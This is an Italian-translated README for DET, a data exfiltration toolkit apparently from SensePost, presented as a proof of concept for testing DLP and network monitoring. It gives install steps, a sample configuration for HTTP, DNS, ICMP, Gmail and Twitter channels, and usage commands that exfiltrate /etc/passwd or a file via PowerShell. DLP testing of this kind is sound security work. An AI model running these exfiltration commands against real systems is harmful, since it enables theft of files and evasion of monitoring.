
(estendibile) Kit di esfiltrazione dati (DET)
=======
DET (è fornito COSÌ COM'È), è una proof of concept per eseguire l'esfiltrazione di dati utilizzando uno o più canali contemporaneamente.
Questa è una Proof of Concept volta a identificare possibili fallimenti DLP. Non dovrebbe mai essere utilizzata per esfiltrare dati sensibili/di produzione (ad esempio in una valutazione).
L'idea era di creare un toolkit generico per collegare qualsiasi tipo di protocollo/servizio al fine di testare la configurazione di soluzioni di Network Monitoring e Data Leakage Prevention (DLP) implementate, contro diverse tecniche di esfiltrazione dei dati.
Il repository principale è ora spostato qui.
DET è stato presentato al BSides Ljubljana il 9 marzo 2016 e le diapositive saranno disponibili qui. Le diapositive sono disponibili qui.
Clona il repository:
git clone https://github.com/sensepost/DET.git
Poi:
pip install -r requirements.txt --user
Per utilizzare DET, è necessario configurarlo e aggiungere le proprie impostazioni (ad es. SMTP/IMAP, passphrase di crittografia AES256 e così via). È stato fornito un file di configurazione di esempio chiamato: config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
Per caricare tutti i plugin:
python det.py -L -c ./config.json
Per caricare solo i moduli twitter e gmail:
python det.py -L -c ./config.json -p twitter,gmail
Per caricare tutti i plugin ed escludere DNS:
python det.py -L -c ./config.json -e dns
Per caricare tutti i plugin:
python det.py -c ./config.json -f /etc/passwd
Per caricare solo i moduli twitter e gmail:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
Per caricare tutti i plugin ed escludere DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
E in PowerShell (modulo HTTP):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
Finora, DET supporta diversi protocolli, elencati qui:
E altri "servizi":
Finora, sono impegnato nell'implementazione di nuovi moduli quasi pronti per il rilascio, tra cui:
Alcuni riferimenti/crediti molto interessanti a persone da cui ho preso ispirazione con i loro progetti:
Puoi contattarmi su Twitter @PaulWebSec. Sentiti libero di contribuire, clonare, forkare, inviare la tua PR e così via.
DET è concesso in licenza sotto Licenza MIT. Le autorizzazioni oltre lo scopo di questa licenza possono essere disponibili presso [email protected].